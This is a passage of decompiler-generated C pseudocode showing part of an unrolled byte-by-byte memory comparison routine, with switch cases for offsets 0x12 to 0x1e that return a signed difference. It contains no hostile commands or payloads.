    																				}
    																			}
    																		}
    																	}
    																	goto L528;
    																case 0x12:
    																	L361:
    																	__eax =  *(__esi - 0x12);
    																	__eflags =  *(__esi - 0x12) -  *(__edx - 0x12);
    																	if( *(__esi - 0x12) ==  *(__edx - 0x12)) {
    																		goto L374;
    																	} else {
    																		__ecx = __al & 0x000000ff;
    																		__eax =  *(__edx - 0x12) & 0x000000ff;
    																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t688 = __ecx > 0;
    																			__eflags = _t688;
    																			__eax = 0 | _t688;
    																			__ecx = _t688 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			__ecx =  *(__esi - 0x11) & 0x000000ff;
    																			__eax =  *(__edx - 0x11) & 0x000000ff;
    																			__ecx = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				__eax = 0;
    																				__eflags = __ecx;
    																				_t694 = __ecx > 0;
    																				__eflags = _t694;
    																				__eax = 0 | _t694;
    																				__ecx = _t694 * 2 - 1;
    																			}
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				goto L228;
    																			} else {
    																				__ecx =  *(__esi - 0x10) & 0x000000ff;
    																				__eax =  *(__edx - 0x10) & 0x000000ff;
    																				__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					__eax = 0;
    																					__eflags = __ecx;
    																					_t700 = __ecx > 0;
    																					__eflags = _t700;
    																					__eax = 0 | _t700;
    																					__ecx = _t700 * 2 - 1;
    																				}
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					goto L228;
    																				} else {
    																					__ecx =  *(__esi - 0xf) & 0x000000ff;
    																					__eax =  *(__edx - 0xf) & 0x000000ff;
    																					__ecx = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						__eax = 0;
    																						__eflags = __ecx;
    																						_t706 = __ecx > 0;
    																						__eflags = _t706;
    																						__eax = 0 | _t706;
    																						__ecx = _t706 * 2 - 1;
    																					}
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						goto L228;
    																					} else {
    																						goto L374;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L528;
    																case 0x13:
    																	L454:
    																	__eax =  *(__esi - 0x13);
    																	__eflags =  *(__esi - 0x13) -  *(__edx - 0x13);
    																	if( *(__esi - 0x13) ==  *(__edx - 0x13)) {
    																		goto L467;
    																	} else {
    																		__eax =  *(__edx - 0x13) & 0x000000ff;
    																		__ecx =  *(__esi - 0x13) & 0x000000ff;
    																		__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t867 = __ecx > 0;
    																			__eflags = _t867;
    																			__eax = 0 | _t867;
    																			__ecx = _t867 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			__ecx =  *(__esi - 0x12) & 0x000000ff;
    																			__eax =  *(__edx - 0x12) & 0x000000ff;
    																			__ecx = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				__eax = 0;
    																				__eflags = __ecx;
    																				_t873 = __ecx > 0;
    																				__eflags = _t873;
    																				__eax = 0 | _t873;
    																				__ecx = _t873 * 2 - 1;
    																			}
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				goto L228;
    																			} else {
    																				__ecx =  *(__esi - 0x11) & 0x000000ff;
    																				__eax =  *(__edx - 0x11) & 0x000000ff;
    																				__ecx = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					__eax = 0;
    																					__eflags = __ecx;
    																					_t879 = __ecx > 0;
    																					__eflags = _t879;
    																					__eax = 0 | _t879;
    																					__ecx = _t879 * 2 - 1;
    																				}
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					goto L228;
    																				} else {
    																					__ecx =  *(__esi - 0x10) & 0x000000ff;
    																					__eax =  *(__edx - 0x10) & 0x000000ff;
    																					__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						__eax = 0;
    																						__eflags = __ecx;
    																						_t885 = __ecx > 0;
    																						__eflags = _t885;
    																						__eax = 0 | _t885;
    																						__ecx = _t885 * 2 - 1;
    																					}
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						goto L228;
    																					} else {
    																						goto L467;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L528;
    																case 0x14:
    																	L162:
    																	_t1059 =  *(_t1354 - 0x14);
    																	__eflags = _t1059 -  *(_t1340 - 0x14);
    																	if(_t1059 ==  *(_t1340 - 0x14)) {
    																		goto L175;
    																	} else {
    																		_t1270 = (_t1059 & 0x000000ff) - ( *(_t1340 - 0x14) & 0x000000ff);
    																		__eflags = _t1270;
    																		if(_t1270 != 0) {
    																			__eflags = _t1270;
    																			_t305 = _t1270 > 0;
    																			__eflags = _t305;
    																			_t1270 = (0 | _t305) * 2 - 1;
    																		}
    																		__eflags = _t1270;
    																		if(_t1270 == 0) {
    																			_t1270 = ( *(_t1354 - 0x13) & 0x000000ff) - ( *(_t1340 - 0x13) & 0x000000ff);
    																			__eflags = _t1270;
    																			if(_t1270 != 0) {
    																				__eflags = _t1270;
    																				_t311 = _t1270 > 0;
    																				__eflags = _t311;
    																				_t1270 = (0 | _t311) * 2 - 1;
    																			}
    																			__eflags = _t1270;
    																			if(_t1270 == 0) {
    																				_t1270 = ( *(_t1354 - 0x12) & 0x000000ff) - ( *(_t1340 - 0x12) & 0x000000ff);
    																				__eflags = _t1270;
    																				if(_t1270 != 0) {
    																					__eflags = _t1270;
    																					_t317 = _t1270 > 0;
    																					__eflags = _t317;
    																					_t1270 = (0 | _t317) * 2 - 1;
    																				}
    																				__eflags = _t1270;
    																				if(_t1270 == 0) {
    																					_t1270 = ( *(_t1354 - 0x11) & 0x000000ff) - ( *(_t1340 - 0x11) & 0x000000ff);
    																					__eflags = _t1270;
    																					if(_t1270 != 0) {
    																						__eflags = _t1270;
    																						_t323 = _t1270 > 0;
    																						__eflags = _t323;
    																						_t1270 = (0 | _t323) * 2 - 1;
    																					}
    																					__eflags = _t1270;
    																					if(_t1270 == 0) {
    																						goto L175;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L228;
    																case 0x15:
    																	L255:
    																	__eax =  *(__esi - 0x15);
    																	__eflags =  *(__esi - 0x15) -  *(__edx - 0x15);
    																	if( *(__esi - 0x15) ==  *(__edx - 0x15)) {
    																		goto L268;
    																	} else {
    																		__ecx = __al & 0x000000ff;
    																		__eax =  *(__edx - 0x15) & 0x000000ff;
    																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t481 = __ecx > 0;
    																			__eflags = _t481;
    																			__eax = 0 | _t481;
    																			__ecx = _t481 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			__ecx =  *(__esi - 0x14) & 0x000000ff;
    																			__eax =  *(__edx - 0x14) & 0x000000ff;
    																			__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				__eax = 0;
    																				__eflags = __ecx;
    																				_t487 = __ecx > 0;
    																				__eflags = _t487;
    																				__eax = 0 | _t487;
    																				__ecx = _t487 * 2 - 1;
    																			}
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				goto L228;
    																			} else {
    																				__ecx =  *(__esi - 0x13) & 0x000000ff;
    																				__eax =  *(__edx - 0x13) & 0x000000ff;
    																				__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					__eax = 0;
    																					__eflags = __ecx;
    																					_t493 = __ecx > 0;
    																					__eflags = _t493;
    																					__eax = 0 | _t493;
    																					__ecx = _t493 * 2 - 1;
    																				}
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					goto L228;
    																				} else {
    																					__ecx =  *(__esi - 0x12) & 0x000000ff;
    																					__eax =  *(__edx - 0x12) & 0x000000ff;
    																					__ecx = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						__eax = 0;
    																						__eflags = __ecx;
    																						_t499 = __ecx > 0;
    																						__eflags = _t499;
    																						__eax = 0 | _t499;
    																						__ecx = _t499 * 2 - 1;
    																					}
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						goto L228;
    																					} else {
    																						goto L268;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L528;
    																case 0x16:
    																	L348:
    																	__eax =  *(__esi - 0x16);
    																	__eflags =  *(__esi - 0x16) -  *(__edx - 0x16);
    																	if( *(__esi - 0x16) ==  *(__edx - 0x16)) {
    																		goto L361;
    																	} else {
    																		__ecx = __al & 0x000000ff;
    																		__eax =  *(__edx - 0x16) & 0x000000ff;
    																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t663 = __ecx > 0;
    																			__eflags = _t663;
    																			__eax = 0 | _t663;
    																			__ecx = _t663 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			__ecx =  *(__esi - 0x15) & 0x000000ff;
    																			__eax =  *(__edx - 0x15) & 0x000000ff;
    																			__ecx = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				__eax = 0;
    																				__eflags = __ecx;
    																				_t669 = __ecx > 0;
    																				__eflags = _t669;
    																				__eax = 0 | _t669;
    																				__ecx = _t669 * 2 - 1;
    																			}
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				goto L228;
    																			} else {
    																				__ecx =  *(__esi - 0x14) & 0x000000ff;
    																				__eax =  *(__edx - 0x14) & 0x000000ff;
    																				__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					__eax = 0;
    																					__eflags = __ecx;
    																					_t675 = __ecx > 0;
    																					__eflags = _t675;
    																					__eax = 0 | _t675;
    																					__ecx = _t675 * 2 - 1;
    																				}
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					goto L228;
    																				} else {
    																					__ecx =  *(__esi - 0x13) & 0x000000ff;
    																					__eax =  *(__edx - 0x13) & 0x000000ff;
    																					__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						__eax = 0;
    																						__eflags = __ecx;
    																						_t681 = __ecx > 0;
    																						__eflags = _t681;
    																						__eax = 0 | _t681;
    																						__ecx = _t681 * 2 - 1;
    																					}
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						goto L228;
    																					} else {
    																						goto L361;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L528;
    																case 0x17:
    																	L441:
    																	__eax =  *(__esi - 0x17);
    																	__eflags =  *(__esi - 0x17) -  *(__edx - 0x17);
    																	if( *(__esi - 0x17) ==  *(__edx - 0x17)) {
    																		goto L454;
    																	} else {
    																		__ecx = __al & 0x000000ff;
    																		__eax =  *(__edx - 0x17) & 0x000000ff;
    																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t841 = __ecx > 0;
    																			__eflags = _t841;
    																			__eax = 0 | _t841;
    																			__ecx = _t841 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			__ecx =  *(__esi - 0x16) & 0x000000ff;
    																			__eax =  *(__edx - 0x16) & 0x000000ff;
    																			__ecx = ( *(__esi - 0x16) & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				__eax = 0;
    																				__eflags = __ecx;
    																				_t847 = __ecx > 0;
    																				__eflags = _t847;
    																				__eax = 0 | _t847;
    																				__ecx = _t847 * 2 - 1;
    																			}
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				goto L228;
    																			} else {
    																				__ecx =  *(__esi - 0x15) & 0x000000ff;
    																				__eax =  *(__edx - 0x15) & 0x000000ff;
    																				__ecx = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					__eax = 0;
    																					__eflags = __ecx;
    																					_t853 = __ecx > 0;
    																					__eflags = _t853;
    																					__eax = 0 | _t853;
    																					__ecx = _t853 * 2 - 1;
    																				}
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					goto L228;
    																				} else {
    																					__ecx =  *(__esi - 0x14) & 0x000000ff;
    																					__eax =  *(__edx - 0x14) & 0x000000ff;
    																					__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						__eax = 0;
    																						__eflags = __ecx;
    																						_t859 = __ecx > 0;
    																						__eflags = _t859;
    																						__eax = 0 | _t859;
    																						__ecx = _t859 * 2 - 1;
    																					}
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						goto L228;
    																					} else {
    																						goto L454;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L528;
    																case 0x18:
    																	L149:
    																	_t1058 =  *(_t1354 - 0x18);
    																	__eflags = _t1058 -  *(_t1340 - 0x18);
    																	if(_t1058 ==  *(_t1340 - 0x18)) {
    																		goto L162;
    																	} else {
    																		_t1270 = (_t1058 & 0x000000ff) - ( *(_t1340 - 0x18) & 0x000000ff);
    																		__eflags = _t1270;
    																		if(_t1270 != 0) {
    																			__eflags = _t1270;
    																			_t280 = _t1270 > 0;
    																			__eflags = _t280;
    																			_t1270 = (0 | _t280) * 2 - 1;
    																		}
    																		__eflags = _t1270;
    																		if(_t1270 == 0) {
    																			_t1270 = ( *(_t1354 - 0x17) & 0x000000ff) - ( *(_t1340 - 0x17) & 0x000000ff);
    																			__eflags = _t1270;
    																			if(_t1270 != 0) {
    																				__eflags = _t1270;
    																				_t286 = _t1270 > 0;
    																				__eflags = _t286;
    																				_t1270 = (0 | _t286) * 2 - 1;
    																			}
    																			__eflags = _t1270;
    																			if(_t1270 == 0) {
    																				_t1270 = ( *(_t1354 - 0x16) & 0x000000ff) - ( *(_t1340 - 0x16) & 0x000000ff);
    																				__eflags = _t1270;
    																				if(_t1270 != 0) {
    																					__eflags = _t1270;
    																					_t292 = _t1270 > 0;
    																					__eflags = _t292;
    																					_t1270 = (0 | _t292) * 2 - 1;
    																				}
    																				__eflags = _t1270;
    																				if(_t1270 == 0) {
    																					_t1270 = ( *(_t1354 - 0x15) & 0x000000ff) - ( *(_t1340 - 0x15) & 0x000000ff);
    																					__eflags = _t1270;
    																					if(_t1270 != 0) {
    																						__eflags = _t1270;
    																						_t298 = _t1270 > 0;
    																						__eflags = _t298;
    																						_t1270 = (0 | _t298) * 2 - 1;
    																					}
    																					__eflags = _t1270;
    																					if(_t1270 == 0) {
    																						goto L162;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L228;
    																case 0x19:
    																	L242:
    																	__eax =  *(__esi - 0x19);
    																	__eflags =  *(__esi - 0x19) -  *(__edx - 0x19);
    																	if( *(__esi - 0x19) ==  *(__edx - 0x19)) {
    																		goto L255;
    																	} else {
    																		__eax =  *(__edx - 0x19) & 0x000000ff;
    																		__ecx =  *(__esi - 0x19) & 0x000000ff;
    																		__ecx = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t456 = __ecx > 0;
    																			__eflags = _t456;
    																			__eax = 0 | _t456;
    																			__ecx = _t456 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			__ecx =  *(__esi - 0x18) & 0x000000ff;
    																			__eax =  *(__edx - 0x18) & 0x000000ff;
    																			__ecx = ( *(__esi - 0x18) & 0x000000ff) - ( *(__edx - 0x18) & 0x000000ff);
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				__eax = 0;
    																				__eflags = __ecx;
    																				_t462 = __ecx > 0;
    																				__eflags = _t462;
    																				__eax = 0 | _t462;
    																				__ecx = _t462 * 2 - 1;
    																			}
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				goto L228;
    																			} else {
    																				__ecx =  *(__esi - 0x17) & 0x000000ff;
    																				__eax =  *(__edx - 0x17) & 0x000000ff;
    																				__ecx = ( *(__esi - 0x17) & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					__eax = 0;
    																					__eflags = __ecx;
    																					_t468 = __ecx > 0;
    																					__eflags = _t468;
    																					__eax = 0 | _t468;
    																					__ecx = _t468 * 2 - 1;
    																				}
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					goto L228;
    																				} else {
    																					__ecx =  *(__esi - 0x16) & 0x000000ff;
    																					__eax =  *(__edx - 0x16) & 0x000000ff;
    																					__ecx = ( *(__esi - 0x16) & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						__eax = 0;
    																						__eflags = __ecx;
    																						_t474 = __ecx > 0;
    																						__eflags = _t474;
    																						__eax = 0 | _t474;
    																						__ecx = _t474 * 2 - 1;
    																					}
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						goto L228;
    																					} else {
    																						goto L255;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L528;
    																case 0x1a:
    																	L335:
    																	__eax =  *(__esi - 0x1a);
    																	__eflags =  *(__esi - 0x1a) -  *(__edx - 0x1a);
    																	if( *(__esi - 0x1a) ==  *(__edx - 0x1a)) {
    																		goto L348;
    																	} else {
    																		__ecx = __al & 0x000000ff;
    																		__eax =  *(__edx - 0x1a) & 0x000000ff;
    																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t638 = __ecx > 0;
    																			__eflags = _t638;
    																			__eax = 0 | _t638;
    																			__ecx = _t638 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			__ecx =  *(__esi - 0x19) & 0x000000ff;
    																			__eax =  *(__edx - 0x19) & 0x000000ff;
    																			__ecx = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				__eax = 0;
    																				__eflags = __ecx;
    																				_t644 = __ecx > 0;
    																				__eflags = _t644;
    																				__eax = 0 | _t644;
    																				__ecx = _t644 * 2 - 1;
    																			}
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				goto L228;
    																			} else {
    																				__ecx =  *(__esi - 0x18) & 0x000000ff;
    																				__eax =  *(__edx - 0x18) & 0x000000ff;
    																				__ecx = ( *(__esi - 0x18) & 0x000000ff) - ( *(__edx - 0x18) & 0x000000ff);
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					__eax = 0;
    																					__eflags = __ecx;
    																					_t650 = __ecx > 0;
    																					__eflags = _t650;
    																					__eax = 0 | _t650;
    																					__ecx = _t650 * 2 - 1;
    																				}
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					goto L228;
    																				} else {
    																					__ecx =  *(__esi - 0x17) & 0x000000ff;
    																					__eax =  *(__edx - 0x17) & 0x000000ff;
    																					__ecx = ( *(__esi - 0x17) & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						__eax = 0;
    																						__eflags = __ecx;
    																						_t656 = __ecx > 0;
    																						__eflags = _t656;
    																						__eax = 0 | _t656;
    																						__ecx = _t656 * 2 - 1;
    																					}
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						goto L228;
    																					} else {
    																						goto L348;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L528;
    																case 0x1b:
    																	L428:
    																	__eax =  *(__esi - 0x1b);
    																	__eflags =  *(__esi - 0x1b) -  *(__edx - 0x1b);
    																	if( *(__esi - 0x1b) ==  *(__edx - 0x1b)) {
    																		goto L441;
    																	} else {
    																		__ecx = __al & 0x000000ff;
    																		__eax =  *(__edx - 0x1b) & 0x000000ff;
    																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t816 = __ecx > 0;
    																			__eflags = _t816;
    																			__eax = 0 | _t816;
    																			__ecx = _t816 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			__ecx =  *(__esi - 0x1a) & 0x000000ff;
    																			__eax =  *(__edx - 0x1a) & 0x000000ff;
    																			__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				__eax = 0;
    																				__eflags = __ecx;
    																				_t822 = __ecx > 0;
    																				__eflags = _t822;
    																				__eax = 0 | _t822;
    																				__ecx = _t822 * 2 - 1;
    																			}
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				goto L228;
    																			} else {
    																				__ecx =  *(__esi - 0x19) & 0x000000ff;
    																				__eax =  *(__edx - 0x19) & 0x000000ff;
    																				__ecx = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					__eax = 0;
    																					__eflags = __ecx;
    																					_t828 = __ecx > 0;
    																					__eflags = _t828;
    																					__eax = 0 | _t828;
    																					__ecx = _t828 * 2 - 1;
    																				}
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					goto L228;
    																				} else {
    																					__ecx =  *(__esi - 0x18) & 0x000000ff;
    																					__eax =  *(__edx - 0x18) & 0x000000ff;
    																					__ecx = ( *(__esi - 0x18) & 0x000000ff) - ( *(__edx - 0x18) & 0x000000ff);
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						__eax = 0;
    																						__eflags = __ecx;
    																						_t834 = __ecx > 0;
    																						__eflags = _t834;
    																						__eax = 0 | _t834;
    																						__ecx = _t834 * 2 - 1;
    																					}
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						goto L228;
    																					} else {
    																						goto L441;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L528;
    																case 0x1c:
    																	_t1057 =  *(_t1354 - 0x1c);
    																	__eflags = _t1057 -  *(_t1340 - 0x1c);
    																	if(_t1057 ==  *(_t1340 - 0x1c)) {
    																		goto L149;
    																	} else {
    																		_t1270 = (_t1057 & 0x000000ff) - ( *(_t1340 - 0x1c) & 0x000000ff);
    																		__eflags = _t1270;
    																		if(_t1270 != 0) {
    																			__eflags = _t1270;
    																			_t255 = _t1270 > 0;
    																			__eflags = _t255;
    																			_t1270 = (0 | _t255) * 2 - 1;
    																		}
    																		__eflags = _t1270;
    																		if(_t1270 == 0) {
    																			_t1270 = ( *(_t1354 - 0x1b) & 0x000000ff) - ( *(_t1340 - 0x1b) & 0x000000ff);
    																			__eflags = _t1270;
    																			if(_t1270 != 0) {
    																				__eflags = _t1270;
    																				_t261 = _t1270 > 0;
    																				__eflags = _t261;
    																				_t1270 = (0 | _t261) * 2 - 1;
    																			}
    																			__eflags = _t1270;
    																			if(_t1270 == 0) {
    																				_t1270 = ( *(_t1354 - 0x1a) & 0x000000ff) - ( *(_t1340 - 0x1a) & 0x000000ff);
    																				__eflags = _t1270;
    																				if(_t1270 != 0) {
    																					__eflags = _t1270;
    																					_t267 = _t1270 > 0;
    																					__eflags = _t267;
    																					_t1270 = (0 | _t267) * 2 - 1;
    																				}
    																				__eflags = _t1270;
    																				if(_t1270 == 0) {
    																					_t1270 = ( *(_t1354 - 0x19) & 0x000000ff) - ( *(_t1340 - 0x19) & 0x000000ff);
    																					__eflags = _t1270;
    																					if(_t1270 != 0) {
    																						__eflags = _t1270;
    																						_t273 = _t1270 > 0;
    																						__eflags = _t273;
    																						_t1270 = (0 | _t273) * 2 - 1;
    																					}
    																					__eflags = _t1270;
    																					if(_t1270 == 0) {
    																						goto L149;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L228;
    																case 0x1d:
    																	__eax =  *(__esi - 0x1d);
    																	__eflags =  *(__esi - 0x1d) -  *(__edx - 0x1d);
    																	if( *(__esi - 0x1d) ==  *(__edx - 0x1d)) {
    																		goto L242;
    																	} else {
    																		__ecx = __al & 0x000000ff;
    																		__eax =  *(__edx - 0x1d) & 0x000000ff;
    																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t430 = __ecx > 0;
    																			__eflags = _t430;
    																			__eax = 0 | _t430;
    																			__ecx = _t430 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			__ecx =  *(__esi - 0x1c) & 0x000000ff;
    																			__eax =  *(__edx - 0x1c) & 0x000000ff;
    																			__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				__eax = 0;
    																				__eflags = __ecx;
    																				_t436 = __ecx > 0;
    																				__eflags = _t436;
    																				__eax = 0 | _t436;
    																				__ecx = _t436 * 2 - 1;
    																			}
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				goto L228;
    																			} else {
    																				__ecx =  *(__esi - 0x1b) & 0x000000ff;
    																				__eax =  *(__edx - 0x1b) & 0x000000ff;
    																				__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					__eax = 0;
    																					__eflags = __ecx;
    																					_t442 = __ecx > 0;
    																					__eflags = _t442;
    																					__eax = 0 | _t442;
    																					__ecx = _t442 * 2 - 1;
    																				}
    																				__eflags = __ecx;
    																				if(__ecx != 0) {
    																					goto L228;
    																				} else {
    																					__ecx =  *(__esi - 0x1a) & 0x000000ff;
    																					__eax =  *(__edx - 0x1a) & 0x000000ff;
    																					__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						__eax = 0;
    																						__eflags = __ecx;
    																						_t448 = __ecx > 0;
    																						__eflags = _t448;
    																						__eax = 0 | _t448;
    																						__ecx = _t448 * 2 - 1;
    																					}
    																					__eflags = __ecx;
    																					if(__ecx != 0) {
    																						goto L228;
    																					} else {
    																						goto L242;
    																					}
    																				}
    																			}
    																		}
    																	}
    																	goto L528;
    																case 0x1e:
    																	__eax =  *(__esi - 0x1e);
    																	__eflags =  *(__esi - 0x1e) -  *(__edx - 0x1e);
    																	if( *(__esi - 0x1e) ==  *(__edx - 0x1e)) {
    																		goto L335;
    																	} else {
    																		__ecx = __al & 0x000000ff;
    																		__eax =  *(__edx - 0x1e) & 0x000000ff;
    																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t613 = __ecx > 0;
    																			__eflags = _t613;
    																			__eax = 0 | _t613;
    																			__ecx = _t613 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			__ecx =  *(__esi - 0x1d) & 0x000000ff;
    																			__eax =  *(__edx - 0x1d) & 0x000000ff;
    																			__ecx = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
    																			__eflags = __ecx;
    																			if(__ecx != 0) {
    																				__eax = 0;
    																				__eflags = __ecx;
    																				_t619 = __ecx > 0;
    																				__eflags = _t619;
    																				__eax = 0 | _t619;
